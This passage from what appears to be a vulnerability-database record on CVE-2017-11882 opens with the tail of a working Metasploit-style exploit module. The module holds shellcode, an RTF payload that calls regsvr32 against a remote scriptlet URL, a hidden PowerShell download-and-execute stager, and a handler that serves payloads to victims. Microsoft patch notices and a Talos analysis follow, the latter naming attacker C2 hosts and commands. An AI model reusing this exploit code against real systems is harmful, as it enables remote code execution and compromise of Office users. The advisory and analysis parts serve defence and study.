\"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\r\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\r\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\r\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\r\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\r\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\r\n shellcode << \"\\x53\" # 3e: 53 push ebx\r\n shellcode << \"\\x51\" # 3f: 51 push ecx\r\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\r\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\r\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\r\n shellcode << \"\\x53\" # 49: 53 push ebx\r\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\r\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n\r\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\r\n footer << '0000C5000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\r\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000001050000050000000D0000004D45544146494C'\r\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\r\n footer << '500000002001C0000000000050000000902000000000500000002'\r\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\r\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\r\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\r\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\r\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\r\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\r\n footer << '00030000000000' + \"\\n\"\r\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\r\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\r\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\r\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\r\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\r\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\r\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\r\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\r\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\r\n footer << \"00000000\\n\"\r\n footer << \"}}}\\n\"\r\n footer << '\\par}' + \"\\n\"\r\n\r\n\r\n payload = shellcode\r\n payload += [0x00402114].pack(\"V\")\r\n payload += \"\\x00\" * 2\r\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\r\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\r\n payload = header + object_class + payload + footer\r\n payload\r\n end\r\n\r\n\r\n\r\n def gen_psh(url, *method)\r\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\r\n\r\n if method.include? 'string'\r\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\r\n else\r\n # Random filename to use, if there isn't anything set\r\n random = \"#{rand_text_alphanumeric 8}.exe\"\r\n # Set filename (Use random filename if empty)\r\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\r\n\r\n # Set path (Use %TEMP% if empty)\r\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\r\n\r\n # Join Path and Filename\r\n file = %Q(echo (#{path}+'\\\\#{filename}'))\r\n\r\n # Generate download PowerShell command\r\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\r\n end\r\n\r\n download_and_run = \"#{ignore_cert}#{download_string}\"\r\n\r\n # Generate main PowerShell command\r\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n if _request.raw_uri =~ /\\.sct$/\r\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\r\n payload = gen_psh(\"#{get_uri}\", \"string\")\r\n data = gen_sct_file(payload)\r\n send_response(cli, data, 'Content-Type' => 'text/plain')\r\n else\r\n print_status(\"Delivering payload to #{cli.peerhost}...\")\r\n p = regenerate_payload(cli)\r\n data = cmd_psh_payload(p.encoded,\r\n payload_instance.arch.first,\r\n remove_comspec: true,\r\n exec_in_place: true\r\n )\r\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\r\n end\r\n end\r\n\r\n\r\n def rand_class_id\r\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\r\n end\r\n\r\n\r\n def gen_sct_file(command)\r\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\r\n if command == ''\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\r\n # If a command is provided, tell the target system to execute it.\r\n else\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\r\n end\r\n end\r\n\r\n\r\n def primer\r\n file_create(generate_rtf)\r\n end\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/29119", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:49:52", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for Office 2010: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2687455\">Service Pack 2 for Office 2010</a> installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a aria-live=\"rude\" bookmark-id=\"officeinstall\" class=\"managed-link content-anchor-link\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" tabindex=\"0\" target=\"\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB2553204\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=215fab9f-ab5b-4a8e-ae2d-858a9001332e\" managed-link=\"\">Download the security update KB2553204 for the 32-bit version of Office 2010</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=bea73649-b3bc-4fad-ad1d-1a8c374fd8e4\" managed-link=\"\">Download the security update KB2553204 for the 64-bit version of Office 2010</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>eqnedt322010-kb2553204-fullfile-x64-en-us.exe</td><td>F0856A37C414C8E5953BCF3C0D299C72053CD0CB</td><td>D1443883888C39BA42FCECAC4EC8FA1A5EF819BC176A209DFEDB3C4967DEBA2E</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x64-zh-cn.exe</td><td>25E3FE752F887E845BB89059DADF647148F53C17</td><td>11ACB21F7B5A77401C9EE9C22ED51F0F20BDB089F3BE46A281DBE5FDC925B301</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x86-en-us.exe</td><td>A45E3A34CC22713D9BB9EC196A44C05CD0A51F16</td><td>A50E99A89B32EC465860F5348F7469F09D24279C0BF6EFBCD7097E2BA51B0860</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x86-zh-cn.exe</td><td>F8489D5D5C95844C643C7F7A2EB011AAFD1D1C8F</td><td>78EA399D1921E04102491D8E412747C5C49BA4F6ECFCD0327EB3176C76FA5644</td></tr></tbody></table><h3>File information</h3><p>The dates and\u00a0times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of Office 2010</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr></tbody></table><h4>For all supported x64-based versions of Office 2010</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr></tbody></table><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T06:54:36", "id": "KB2553204", "href": "https://support.microsoft.com/en-us/help/2553204/", "published": "2017-11-14T00:00:00", "title": "Description of the security update for Office 2010: November 14, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:38:14", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for 2007 Microsoft Office Suite: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/949585\">Service Pack 3 for the 2007 Microsoft Office Suite</a> installed on the computer.</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011276\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=f6c365a1-80f6-464b-96df-d32508a46757\" managed-link=\"\">Download the security update KB4011276 for the 32-bit version of 2007 Microsoft Office Suite</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>eqnedt322007-kb4011276-fullfile-x86-en-us.exe</td><td>5BDF63F270C8389181BCA75D2C5CDED6E5B58978</td><td>9AE1D3A1109C731EE1C730A6864D9F0F944BF14404C31943619EFECC2E1B1BE3</td></tr><tr><td>eqnedt322007-kb4011276-fullfile-x86-zh-cn.exe</td><td>E82D11355EF17642A56A10C7216BFD33B697321C</td><td>C8B36716E0E56807517A96DFAC8235F0B76EF5AC77F5A7EF4B38011EB90EE796</td></tr></tbody></table><h3>File information</h3><p>The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of 2007 Microsoft Office Suite</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>Eqnedt32.exe_1033</td><td>2017.8.14.0</td><td>552,680</td><td>26-Oct-2017</td><td>07:29</td></tr><tr><td>Eqnedt32.exe_2052</td><td>2017.8.14.0</td><td>552,680</td><td>26-Oct-2017</td><td>07:29</td></tr></tbody></table><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T06:49:42", "id": "KB4011276", "href": "https://support.microsoft.com/en-us/help/4011276/", "published": "2017-11-14T00:00:00", "title": "Description of the security update for 2007 Microsoft Office Suite: November 14, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-06-05T08:31:45", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "[](<https://1.bp.blogspot.com/-0LZquP7JCK8/XPZy_5h1kXI/AAAAAAAAByw/6jEpKcjZWpIoeGKAo9GwZCUdXPfqIqjrgCLcBGAs/s1600/frankenstein.png>)_This blog was authored by [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>) and [Kendall McKay](<https://twitter.com/kkmckay22>)._\n\n### Executive summary\n\nCisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the \"Frankenstein\" campaign. We assess that the attackers carried out these operations between January and April 2019 in an effort to install malware on users' machines via malicious documents. We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein \u2014 the name refers to the actors' ability to piece together several unrelated components \u2014 leveraged four different open-source techniques to build the tools used during the campaign. \n \nThe campaign used components of: \n\n\n * An article to detect when your sample is being run in a VM\n * A GitHub project that leverages MSbuild to execute a PowerShell command\n * A component of GitHub project called \"Fruityc2\" to build a stager\n * A GitHub project called \"PowerShell Empire\" for their agents\nWe believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. These obfuscation techniques will require network defenders to modify their posture and procedures to detect this threat. \n \nThis report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also took additional steps to only respond to GET requests that contained predefined fields, such as a non-existent user-agent string, a session cookie, and a particular directory on the domain. The threat actors also used different types of encryption in order to protect data in transit. \n \n\n\n### Trojanized documents\n\nTalos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. We were able to correlate these two techniques to the same threat campaign due to overlapping threat actor C2. \n \nIn the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan. Once the victim opens the document, it fetches a remove template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used [CVE-2017-11882,](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) to execute code on the victim's machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named \"WinUpdate\". \n \n\"/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR\" That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager. The stager will be described in more detail in the next section. \n \n[](<https://1.bp.blogspot.com/--XWRPzTAtLU/XPZzGu_JVHI/AAAAAAAABy0/zqLTV6kqlQMuPROE6SJDUhG_tlH_0p3QACLcBGAs/s1600/image9.png>) \n--- \n_Example of the MinutesofMeeting-2May19.docx._ \nOne of the samples we analyzed that prompted the victim to enable macros claimed to have \"been secured by Kaspersky,\" a well-known anti-virus firm. While threat actors commonly create fake security labels for malicious documents, this technique could also indicate that the threat actor had performed reconnaissance on the intended victims, suggesting that the documents had been socially engineered to some degree. \n \n[](<https://1.bp.blogspot.com/-KdU6S2QQ8ng/XPZzODN7CrI/AAAAAAAABy4/oJpnVDnNaXkEQvVUuWw7mG0wbgtpWKbSQCLcBGAs/s1600/image7.png>) \n--- \n_Example of malicious Microsoft Word document._ \nTwo other documents we associated with this group appeared to be more targeted in nature. One document contained logos that appear to be from several Middle Eastern countries' government agencies, while the other document showed an image of unspecified buildings that were possibly recognizable to a select group of targets. \n[](<https://1.bp.blogspot.com/-PCw9cVa4eYc/XPZzXZotoHI/AAAAAAAABzA/fxK0s6EVod8S-UZ0SpZEimuPIOP4dBwhwCLcBGAs/s1600/image6.png>) \n--- \n_Trojanized document containing official logos._ \n[](<https://1.bp.blogspot.com/-JSClxJjhN0A/XPZze-7B3gI/AAAAAAAABzI/zBToNuJW29kq5l-08GtblTs5B0EKCB0ugCLcBGAs/s1600/image5.png>) \n--- \n_Trojanized document containing the image of unidentified buildings._ \n \n### Visual Basic script and its anti-analysis features\n\nAs soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. The VBA script contained two anti-analysis features. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running: \n\n\n * VMWare\n * Vbox\n * Process Explorer\n * Process Hacker \n * ProcMon\n * Visual Basic\n * Fiddler \n * WireShark\nNext, the script would check to see if any of the following tasks were running: \n\n\n * VMWare\n * Vbox\n * VxStream\n * AutoIT\n * VMtools\n * TCPView\n * WireShark\n * Process Explorer\n * Visual Basic \n * Fiddler\n[](<https://1.bp.blogspot.com/-D9vE5Mn4jyg/XPZzpXk2lYI/AAAAAAAABzQ/XbYcmZf1Dk4niXHbUzgiFaldqo0bW6L_QCLcBGAs/s1600/image3.png>) \n--- \n_A copy of the macro's code, which checks for analysis-oriented applications._ \nIf any of the aforementioned applications or task names were discovered during the enumeration process, the script would stop execution. The next evasion technique was to call WMI and determine the number of cores allocated to the system. If the number of cores was less than two, the script would stop execution and the end user would receive a pop-up message stating \"The File is not compatible with your Microsoft Office Version.\" We assess that this technique was modeled after a 2015 [TrustedSec report](<https://www.trustedsec.com/2015/05/bypassing-virtualization-and-sandbox-technologies/>) as a way to detect if the sample was being run in a virtual machine or a sandbox environment. \n \nOnce the evasion checks were complete, the threat actors used [MSbuild to execute](<https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view%3Dvs-2015>) an actor-created file named \"LOCALAPPDATA\\Intel\\instal.xml\". Based on lexical analysis, we assess with high confidence that this component of the macro script was based on an open-source project called \"[MSBuild-inline-task](<https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml>).\" While this technique was previously [documented](<https://www.carbonblack.com/2018/03/15/threat-analysis-recent-attack-technique-attempts-bypass-whitelisting-leveraging-ms-office-document-macros-msbuild-certutil/>) last year, it has rarely been observed being used in operations. Talos suspects the adversary chose MSBuild because it is a signed Microsoft binary, meaning that it can bypass application whitelisting controls on the host when being used to execute arbitrary code. \n \n[](<https://1.bp.blogspot.com/-6Zjzx9h25M4/XPZzxpDDxhI/AAAAAAAABzY/bfEvJMrlzroxM-cAe6HDCStBS_YUQWELACLcBGAs/s1600/image8.png>) \n--- \n_A copy of the threat actors' version of the MSbuild-inline-task._ \nThe last line of the file would run encoded commands from the command line: \n\n\n> cmd.exe /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe LOCALAPPDATA\\Intel\\instal.xml C:\\Windows\\System32\n\nOnce the \"instal.xml\" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. While analyzing this stager, we noticed some similarities to the \"Get-Data\" function of the [FruityC2](<https://github.com/xtr4nge/FruityC2/blob/master/agent/ps_agent.ps1>) PowerShell agent. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud. A copy of the deobfuscated stager can be seen in the image below. \n[](<https://1.bp.blogspot.com/-XKd76hBj3kw/XPZz6iBPv_I/AAAAAAAABzg/Z3yud4aM0ZAFjcv_u7zXphCKGdQViDeigCLcBGAs/s1600/image4.png>) \n--- \n_Copy of the deobfuscated stager._ \nWhen executed successfully, the stager connected to the C2. However, in order to receive the agent, the request needed to contain the correct directory, user-agent string, and session cookie. The anticipated GET request appeared as follows: \n\n\n> GET /FC001/JOHN HTTP/1.1 \nCookie: session=drYuSCFQdbQYHozM2dku17KYkY8= \nUser-Agent: Microsoft Internet Explorer \nHost: msdn[.]cloud \nConnection: Keep-Alive\n\nIf successful, the C2 would return a string of characters. Once the string was RC4 decrypted, it launched a [PowerShell Empire agent](<https://github.com/EmpireProject/Empire/blob/master/data/agent/agent.ps1>). The PowerShell script would attempt to enumerate the host to look for certain information, such as: \n\n\n * Username\n * Domain name\n * Machine name \n * Public IP address \n * Checks if the current user has administrative privileges\n * Obtains a list of all currently running processes\n * Calls WMI to obtain operating system version\n * Obtains the security system's SHA256 HMAC\nOnce the aforementioned information was obtained, it was sent back to the threat actor's C2. Similar to the stager, the agent included functionality to communicate via an encrypted channel, in this case AES-CBC, in addition to using a specific user-agent string and a session key. This agent would allow the threat actors to remotely interact with the agent to upload and download files and to use the various plugins that were compatible with the Empire framework, such as those used to harvest credentials on the victim's machine. While this threat actor exhibited signs of sophistication, there were some small components that were overlooked. For example, it appears that the threat actor forgot to configure certain components for the Empire agent, such as leaving placeholder values for some variables like \"WORKING_HOURS_REPLACE\" and \"REPLACE_KILLDATE\". \n \n\n\n### Conclusion\n\nThe actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available tools, which offer them some advantages over a completely custom toolset. A campaign that leverages custom tools is more easily attributed to the tools' developers. One example of this was the code overlap in the [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) malware that allowed us to associate the activity with the Blackenergy malware. By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence. Over the past several years, there have been multiple instances of advanced threat actors using open-source techniques, such as [MuddyWater,](<https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html>)[ ](<https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html>)among others. This growing trend highlights that highly trained operators are increasingly using unsophisticated tools to accomplish their goals. \n \n\n\n### Coverage\n\nWays our customers can detect and block this threat are listed below. \n \n[](<https://1.bp.blogspot.com/-O1GoXuet5cU/XPZ0HIGVN4I/AAAAAAAABzo/gLKmHfW-djsHQOB5R5Td_fKExQQ8c2y-ACLcBGAs/s1600/image1.png>)Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free [here.](<http://cisco.com/go/tryamp>) \n \n[](<http://cisco.com/go/tryamp>) \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or Web Security Appliance 